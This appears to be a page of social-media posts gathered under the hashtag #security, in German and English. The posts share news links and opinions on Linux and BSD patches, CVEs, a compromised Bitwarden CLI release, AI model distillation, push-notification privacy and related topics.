Search results for tag #security
https://www.heise.de/news/Linux-Distribution-CachyOS-mit-neuer-Software-Verwaltung-11274112.html
CashyOS kann nun DNS over https👍
"Let us fight for a new world, a decent world that will give men a chance to work, that will give youth a future and old age a security."
Charlie Chaplin
Es ist ein Armutszeugnis, wie einige die Signal-Debatte instrumentalisieren: Erst wird suggeriert, Signal sei unsicher – dann werden »Alternativen« empfohlen, die diesen Namen kaum verdienen.
Signal war hier nicht die Schwachstelle. Die Schwachstelle lag im Umgang mit sicherheitsrelevanten Funktionen.
Die Angreifer mussten keine Verschlüsselung brechen. Menschen täuschen und Prozesse ausnutzen reicht schon aus.
#Signal #Messenger #Security #Sicherheit
/kuk
openSUSE Lands Post-Quantum Hybrid Cryptography in Leap and Tumbleweed https://9to5linux.com/opensuse-lands-post-quantum-hybrid-cryptography-in-leap-and-tumbleweed
@opensuse #Linux #OpenSource #security
Alt...
libzupt logo
Anthropic recorded over 16 million interactions with Claude from about 24,000 fake accounts, which are reportedly linked to Chinese companies trying to cheaply copy the model. Google faced more than 100,000 attempts to copy Gemini. OpenAI reports that most distillation attacks they find come from China. This is not an isolated event. It is a repeatable and scalable strategy.
Breaking the terms of service isn't enough to stop people when the reward is closing a years-long gap in AI technology. The House Select Committee on China wants to label 'adversarial distillation' as industrial espionage under the Economic Espionage Act, which makes sense. At the moment, getting caught just means losing an account. That is hardly a real punishment.
The Trump-Xi summit is approaching, and the White House is reportedly considering sanctions. However, Trump has previously traded away export controls for other deals. If that happens again, AI companies may have to protect their intellectual property by themselves.
When laws fail to keep pace with new types of attacks, attackers automatically have the advantage.
If your company is developing anything unique using advanced AI models, your API access logs are now part of your security risks.
#AI #Cybersecurity #NationalSecurity #IntellectualProperty #Geopolitics #security #privacy #cloud #infosec #Espionage
https://www.thatprivacyguy.com/blog/anthropic-spyware
Security researcher Alexander Hanff wrote an article titled Anthropic secretly installs spyware when you install Claude Desktop. Anthropic has not denied the report, as of time of post.
TLDR: If a user installs Claude Desktop on a Mac (pc test results tba), it installs a backdoor into every browser, even those not installed. By testing on a clean machine, Hanff discovered that Installing Claude Desktop for macOS drops a Native Messaging host manifest into multiple Chromium profiles (Chrome, Edge, Brave, Arc, Vivaldi, Opera, Chromium), even including for browsers that are not actually installed yet.
How bad is it? Well...that depends. What it does is create a very wide attack vector, especially for prompt injection. That it is done invisibly, without telling the user, and making it difficult to remove, is certainly problematic.
I dunno man, maybe don’t use the planet destroying tulip craze?
RE: https://mastodon.social/@andrewnez/116478133377243019
Workflow security continues to be a common cause of compromises of open source projects.
If you're using GitHub Actions and don't want this to happen to your project: use Zizmor and treat the findings seriously, especially insecure triggers and user-controllable template injections.
pip 26.1 is an incredible release, thank you to the pip maintainers!! 💜
– Relative dependency cooldown support!
– Installing from pylock.toml
– Multiple security fixes
Read the full blog post by @ichard26
https://ichard26.github.io/blog/2026/04/whats-new-in-pip-26.1/
⚠️🔒 "Pack2TheRoot" erlaubt laut Telekom‑Security in PackageKit eine Privilegien‑Escalation (TOCTOU, CVE‑2026‑41651, CVSS 8.8). Mehrere Standard‑Distros betroffen — Update auf PackageKit ≥1.3.5 und zeitnahe System‑Patches empfohlen. https://www.heise.de/news/Pack2TheRoot-Sicherheitsluecke-betrifft-mehrere-Linux-Distributionen-11272897.html #Pack2TheRoot #Linux #Security #PackageKit 🐧
„Pack2TheRoot“: Sicherheitslücke betrifft mehrere Linux-Distributionen
Das Telekom-Sicherheitsteam hat die Sicherheitslücke „Pack2TheRoot“ entdeckt, die Rechteausweitung in mehreren Distributionen ermöglicht.
#IT #Linux #LinuxDistribution #Security #Sicherheitslücken #DeutscheTelekom #Updates #news
Mit Linux User Namespaces in Kubernetes kann ich endlich ein paar widerspenstige Images (Finger geht Richtung #grocy) glauben lassen, sie laufen als root, ohne tatsächliche Root-Rechte aus Kernel-Sicht.
Einfach spec.hostUsers=false setzen, fertig. In k8s v1.36 endlich stable/GA.
Kleines, feines Security Feature.
DI.DAY // Digital Tooltime and Networking | Part III
Sunday, May 3 2026 at 4pm.
Kultur im Bunker, Berliner Straße 22C im Viertel, Bremen
Lava will give us an introduction to Delta Chat with a hands-on session to get you started on a secure decentralized messenger. No need for a phone number, no AI or ads, this is just a solid noncommercial messenger with automatic PGP encryption @delta ❤️. Plus there’s mini Apps
#diday #duday #decentralized #security #deltachat #networking #bremen
Alt...
Sharepic showing the Delta Chat Logo (the greek letter delta inside a speaking bubble). Above there is written Di.Day, Delta Chat Onboarding
Below the logo 3. May 4PM Kultur im Bunker. In the background you can see cartonnish symbols for secure email, server and desktop pc and other tech devices. Above there is symbolic representation of data-reading devices lurking in to the picture.
The pic is in the default layout of the the DiDay Campaign,
Act Now to Stop #California ’s Paternalistic & #Privacy -Destroying #SocialMedia Ban
That means, all Californians would be required to submit highly sensitive gov-issued ID or #biometric info to private companies simply to participate in the modern public square. In the name of “safety,” this bill would destroy online #anonymity , expose sensitive personal data to #breach & abuse, & replace parental decision-making with state-mandated #censorship
#ab1709 #security
@bms48 you wrote:
"… shitcan all involvement with them insofar as that is possible, as they clearly seek to shitcan me and my kind. Late stage capitalism begets the era of the shitcan. #shitcanned"
I edited addresses for The Linux Foundation @linuxfoundation and the Open Source Security Foundation (OpenSSF) @openssf into the opening post.
Since The Linux Foundation is to thank for various improvements to FreeBSD: to what degree, now and in the future, will you shitcan your involvement with the FreeBSD Project?
Below: food for thought. A few points of reference.
Alpha-Omega's partnership with FreeBSD — <https://freebsdfoundation.org/our-donors/donors/?donationType=partners&donationYear=2026>
Why Your Open Source Project Should Prioritize Security: Lessons from FreeBSD’s Proactive Approach | FreeBSD Foundation — <https://freebsdfoundation.org/blog/why-your-open-source-project-should-prioritize-security-lessons-from-freebsds-proactive-approach/> (2024-10-02)
FreeBSD Foundation Releases Bhyve and Capsicum Security Audit Funded by Alpha-Omega Project | FreeBSD Foundation — <https://freebsdfoundation.org/news-and-events/latest-news/freebsd-foundation-releases-bhyve-and-capsicum-security-audit-funded-by-alpha-omega-project/> (2024-11-18)
Strengthening FreeBSD: Addressing Vulnerabilities Through Synacktiv’s Code Audit | FreeBSD Foundation — <https://freebsdfoundation.org/blog/strengthening-freebsd-addressing-vulnerabilities-through-synacktivs-code-audit/> (2024-11-18)
Cleaning Up Critical Infrastructure in FreeBSD | FreeBSD Foundation — <https://freebsdfoundation.org/blog/cleaning-up-critical-infrastructure-in-freebsd/> (2026-04-20)
<https://alpha-omega.dev/grants/grantrecipients/#fws_69ec53f1c42b3>
"… FreeBSD was granted $150,000 for the purpose of improving the security and maintenance of third-party software within the FreeBSD base system."
The mission of Alpha-Omega – a Linux Foundation project – is:
"to protect society by catalyzing sustainable security improvements across open source, from the largest global projects to the smallest but essential components maintained by individuals. "
Further:
"Open source underpins the world’s digital infrastructure, yet much of it remains under-resourced and exposed to growing security risks. Alpha-Omega exists to address this challenge by serving as a helping hand and funding catalyst that supports the maintainers, communities, and ecosystems where security investment can have the greatest impact."
#security #shitcanned #open #source #Linux #FreeBSD #investment #donations #funding
AI/ML Security
<https://openssf.org/groups/ai-ml-security/>
"This working group is situated at the intersection between security and artificial intelligence (AI). We explore the security risks associated with Large Language Models (LLMs), Generative AI (GenAI), and other forms of artificial intelligence and machine learning (ML), and their impact on open source projects, maintainers, their security, communities, and adopters. Furthermore, we explore using AI and ML to strengthen the security of other open source projects.
This group in collaborative research and peer organization engagement to explore topics related to AI and security. This includes security for AI development (e.g., supply chain security) but also using AI for security. We are covering risks posed to individuals and organizations by improperly trained models, data poisoning, privacy and secret leakage, prompt injection, licensing, adversarial attacks, and any other similar risks.
This group leverages prior art in the AI/ML space,draws upon both security and AI/ML experts, and pursues collaboration with other communities (such as the CNCF’s AI WG, LFAI & Data, AI Alliance, MLCommons, and many others) who are also seeking to research the risks presented by AL/ML to OSS in order to provide guidance, tooling, techniques, and capabilities to support open source projects and their adopters in securely integrating, using, detecting and defending against LLMs. …"
Aber linux ist doch sicher…
Linux ist so „sicher“, dass sogar den deutschen telekomikern ein cräck auf grundlage eines zwölf jahre alten fehlers gelingt [archivversjon, der link geht auf einen englischsprachigen text], wenn sie mal kurz ein angelerntes neuronales netzwerk um hilfe bitten. 😁️
#Epic #Fail #Link #Linux #Security #TelekomSurveillance vendors caught abusing access to telcos to track people’s phone locations, researchers say
The Citizen Lab found two separate surveillance vendors abusing the backbone of cellular networks to spy on several victims across the world.
#cybersecurity #diameter #israel #location-tracking #privacy #security #ss7 #surveillance
https://techcrunch.com/2026/04/23/surveillance-vendors-caught-abusing-access-to-telcos-to-track-peoples-phone-locations-researchers-say/
Alt...
Surveillance vendors caught abusing access to telcos to track people’s phone locations, researchers say
Bitwarden-cli 2026.4.0 compromised. Ugh.
Not something one likes to read in the morning. :(
Passwortsafe Bitwarden: Kommandozeilen-Client trojanisiert
Das Bitwarden-Security-Team bestätigt, dass kurzzeitig eine bösartige Version des Kommandozeilen-Client ausgeliefert wurde.
#AmazonWebServices #GitHub #GoogleCloud #IT #Malware #Passwörter #Security #SSH #news
BREAKING! Meshcore team splits over dispute over AI-generated code disclosure, and hostile trademark takeover.
Meshcore is an off-grid, decentralised mesh radio platform powered by low-cost and public access LoRa radio technology for reliable, long-range emergency text and embedded sensors communication. It can communicate across kilometres — no towers, no subscriptions, no single point of failure.
https://blog.meshcore.io/2026/04/23/the-split
#meshcore #meshtastic #lora #radio #opensource #foss #drama #privacy #security #selfsovereignty #ai #copyright #takeover
Microsoft issues emergency update for macOS and Linux ASP.NET threat
When authentication fails, things can go very, very wrong.
#asp.net #biz-&-it #microsoft #security #vulnerabilities #windows
https://arstechnica.com/security/2026/04/microsoft-issues-emergency-update-for-macos-and-linux-asp-net-threat/
Alt...
An image pulled automatically from the post for decorative purposes only.
Vanadium version 148.0.7778.49.0 released:
https://github.com/GrapheneOS/Vanadium/releases/tag/148.0.7778.49.0
See the linked release notes for a summary of the improvements over the previous release and a link to the full changelog.
Forum discussion thread:
https://discuss.grapheneos.org/d/34577-vanadium-version-14807778490-released
We released the #XLibre Xserver 25.0.0.22 and 25.1.4 on Apr 21 containing #security fixes for CVE-2026-33999, CVE-2026-34000, CVE-2026-34001, CVE-2026-34002, and CVE-2026-34003 of the X.Org Server. We recommend everyone update ASAP. #CVE https://github.com/X11Libre/xserver/releases/tag/xlibre-xserver-25.1.4
🔐 Introducing: Unified Attestation
An open-source project for verifying the integrity of Android apps—as an alternative to Google's Play Integrity.
The goal is to make apps such as banking and payment apps usable on independent Android systems without relying on Google services.
We invite developers, ROM projects, and app providers to get involved.
#Volla #VollaOS #OpenSource #software #hardware #Privacy #Security #DeGoogle
CanadaLife insurance company suffered a data breach of 5.6 millions records of PII Information of their clients.
www.theglobeandmail.com/business/art...
#security #cybersecurity #databreach #hack #hackers #malware #fuck
Attackers Are Hunting High-Impact Node.js Maintainers in a Coordinated Social Engineering Campaign, by @sarahgooding (@SocketSecurity):
https://socket.dev/blog/attackers-hunting-high-impact-nodejs-maintainers
W3C is pleased to join the GDC Council in co-organizing the Global Digital Collaboration Conference 2026! This 2nd edition brings together leaders in #DigitalWallets, #VerifiableCredentials, standards, #security and regulation to advance digital trust infrastructure worldwide.
The invitation-only event is co-hosted by intergovernmental, NGO, and open-source organizations. W3C is shaping the program, with team members on site for in-person networking.
🎫 Register now! https://luma.com/1ey4sf2a
Alt...
Global Digital Collaboration Conference 2026
- Join us for the next edition as we continue advancing digital trust infrastructure worldwide
- Organized by Intergovernmental and Non-governmental Organizations, in particular Standard Development, and Open Source Organizations
- The global pulse of cross-sector innovation: 3 days to bridge gaps and solve for interoperability
- Hosted by the Swiss Confederation at Palexpo
Quick thought experiment. Pull out your phone, look at your lock screen, and ask yourself who else is reading those notification previews. The answer is stranger than you think.
EFF just laid out what most people don't realize: push notifications usually route through Apple or Google servers before they hit your device, often with content visible in the clear. Then they get written to a local notification database that doesn't always get wiped when you swipe the alert away or even when you uninstall the app. 404 Media reported the FBI has pulled deleted Signal message text out of that database using standard forensic tools. Signal. The app you installed specifically because you didn't want this.
🔐 Apple and Google now require a court order for push notification data, but Apple's transparency report still shows hundreds of users handed over
📱 Lock screen previews are a free read for anyone who picks up your phone, including at a border crossing or traffic stop
🧹 Uninstalling an app does not guarantee its notification history goes with it, and we don't know what gets backed up to iCloud or Google
🛠️ Signal's notification setting "No Name or Content" is a 30-second fix that closes the easiest leak
For the security folks, this is a useful reminder that end-to-end encryption ends at the endpoint, and the endpoint includes a SQLite file most users have never heard of. For the executives, this is the reason your travel security policy for high-risk regions should say more than "use Signal." The default settings on a stock iPhone leak more than the app you chose to protect you.
https://www.eff.org/deeplinks/2026/04/how-push-notifications-can-betray-your-privacy-and-what-do-about-it
#Privacy #Cybersecurity #MobileSecurity #security #cloud #infosec
GhostBSD 26.1: FreeBSD-Desktop mit XLibre und ZFS-Snapshots
GhostBSD 26.1 integriert FreeBSD 15.0p2, setzt auf XLibre und bietet verbesserte Hardware-Unterstützung sowie ZFS-Snapshots.
#Betriebssystem #BSD #FreeBSD #IT #Linux #OpenSource #Security #Wayland #Xfce #news
An ex-Azure engineer published six essays arguing Microsoft's cloud has been on life support since 2008, and the cause isn't bad code. It's bad people decisions. Rushed launch, post-launch talent exodus, no testing discipline, no architectural vision. Sound familiar to anyone who's worked in a place that ships first and staffs later?
Now layer 2026 on top. Microsoft cut roughly 15,000 jobs in mid-2025. Coding agents are pumping out 4x more commits in 90 days. GitHub's unofficial uptime has slipped under 90% and the proposed fix is, wait for it, moving more of GitHub onto Azure. The same Azure the engineer says is held together with rushed decisions and wishful thinking.
🧠 The phrase that stuck with me is "knowledge dilution from high attrition." When the senior people who knew why a system was built that way leave, no LLM in the world can recover that context
🤖 More AI-written code does not mean less work. It means more code to review, test, deploy, and run, which means more compute and more humans needed downstream
📉 OpenAI signing an $11.9B compute deal with CoreWeave in March 2025 was the loudest "we don't trust your capacity" signal Microsoft has ever received from its closest partner
🪑 The bet that AI lets you cut headcount keeps colliding with the reality that AI generates work for humans faster than it removes it
Every CIO I talk to is being pitched the same dream: fewer engineers, more agents, lower run rate. The Azure story is what happens when that math doesn't pencil out and the bill comes due in incidents instead of dollars.
https://www.theregister.com/2026/04/04/azure_talent_exodus/
#Azure #AI #Leadership #security #privacy #cloud #infosec #cybersecurity #software #devops
OpenBSD 7.8 // SLAACD // ERRATA 033
Date: April 21, 2026
Name: 033_slaacd.patch
Description: slaacd(8) could crash due to buffer overflow.
Link: https://cdn.openbsd.org/pub/OpenBSD/patches/7.8/common/033_slaacd.patch.sig
🔒 New release: “Internet.nl now tests on the latest @NCSC_NL TLS guidelines”
➡️ https://en.internet.nl/article/release-1.11/
❓ Are your web and mailservers ready for future-proof TLS?
🌐 Keeping your configuration up-to-date makes the internet more secure.
🚀 Have fun testing and improving if needed!
Alt...
Image of a green shield with a checkmark and the letters TLS
#tech #dev #security #cybersecurity #InfoSec #Vercel #breach #OAuth #AI
Google blockierte 2025 mit KI-Hilfe mehr als 8 Milliarden Werbeanzeigen
Milliarden gestoppte Werbeanzeigen, zig Millionen gesperrte betrügerische Nutzerkonten. Das hat Google mit der Gemini-KI erledigt.
heise+ | Little Snitch für Linux: Netzwerkverkehr überwachen und regeln
Welche Programme telefonieren nach Hause? Little Snitch für Linux beantwortet nicht nur die Frage, sondern unterbindet unerwünschte Kontakte mit einem Klick.
#ArchLinux #Datenschutz #Debian #Firewall #IT #Linux #Security #Ubuntu #news
@nixCraft I'm seeing a lot of comments about #EU #GDPR & Right to be Forgotten, However to train its #AI #Atlassian either uses metadata (by definition no identifier, things like story points & tasks classes), or in-app data (think: comments), where it will "remove direct identifiers, aggregate data, and apply protections before using it for training". So in a nutshell, GDPR not applicable and in theory, no additional #security risk. Issues around #IP & #copyright remain wide open.
OpenBSD -current is now "7.9-current" https://www.undeadly.org/cgi?action=article;sid=20260420053238 #openbsd #development #current #newrelease #security #freesoftware #libresoftware
@JulianOliver I've run 2 with @openrightsgroup amd #no2id in #Manchester too : https://cryptoparty-mcr.org/
XOrg Server 21.1.22 and #Xwayland 24.1.10 Released to Patch Multiple #Security Vulnerabilities https://9to5linux.com/xorg-server-21-1-22-and-xwayland-24-1-10-released-with-multiple-security-fixes
#OpenSource #FreeSoftware #Linux
Alt...
XOrg logo
#OpenSSL 4.0 Released with Support for Encrypted Client Hello, SNMP KDF, and More https://9to5linux.com/openssl-4-0-released-with-support-for-encrypted-client-hello-snmp-kdf-and-more
#OpenSource #FreeSoftware #security #Linux
Alt...
OpenSSL logo